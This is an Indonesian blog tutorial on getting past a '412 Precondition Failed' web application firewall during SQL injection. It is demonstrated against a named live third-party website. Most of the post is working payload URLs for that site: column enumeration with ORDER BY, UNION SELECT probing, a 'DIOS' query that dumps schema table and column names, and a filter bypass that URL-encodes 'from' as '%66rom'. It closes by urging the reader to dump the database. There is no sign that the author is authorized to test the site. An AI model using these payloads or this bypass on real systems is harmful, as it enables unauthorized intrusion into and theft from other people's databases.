--> Skip to main content

Cara Bypass Sqli 412 Precondition Failed

Oke pada kesempatan kali ini gw mau sharing tutorial Cara Bypass Sqli 412 Precondition Failed.

Pernah gasih kalian pada saat melakukan inject suatu website gatau kenapa tiba-tiba kena WAF sama seperti halnya yang gw alamin saat ini yaitu kena waf 412 precondition failed.

Pasti pernah kan? Apalagi kalo kalian kena wafnya sama kek gw, cocok banget jadi sekarang kita bahas aja bagaimana cara mengatasinya, simak dibawah ini.

Disini gw udah dapat target yang mau di eksekusi atau di bypass, dan ini live targetnya,

http://www.cruiseland.in/houseboat-package-detailed.php?id=5

Selanjutnya langsung saja kita masukan order+by+1-- dan sampai menemukan errornya.
Disini gw mendapatkan errornya diangka 11 berarti jumlah columnnya ada 10.


Oke, lanjut ke step berikutnya ya itu mencari angka magicknya dengan memasukan query union+select+1,2,3-- dan seterunya sampai angka 10 seperti berikut ini,

http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10--

Dan disini gw mendapatkan angka magicknya 2 dan 5 lebih jelasnya bisa dlihat gambar bawah ini,


Setelah kita mendapatkan angka magicknya, sekarang kita tinggal masukan dios. Disini gw masukin diosnya diangka 5 seperti berikut ini,

http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6,7,8,9,10--



Dan ternyata setelah di inject dengan dios tadi malah kena waf 412 Precondition Failed oke kita bypass.

Cara bypassnya tinggal ubah huruf f pada " from " dengan url encode seperti ini contohnya,

f=%66
%66rom

Contoh seperti berikut ini,

http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,make_set(6,@:=0x0a,(select(1)%66rom(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6,7,8,9,10--


Nah tuh lihat gambar diatas, bypass sukses. Kalo udah begini tinggal didump databasenya.

Sekian dari gue, semoga bermanfaat.
Comment Policy: Silahkan tuliskan komentar Anda yang sesuai dengan topik postingan halaman ini. Komentar yang berisi tautan tidak akan ditampilkan sebelum disetujui.
Buka Komentar
Tutup Komentar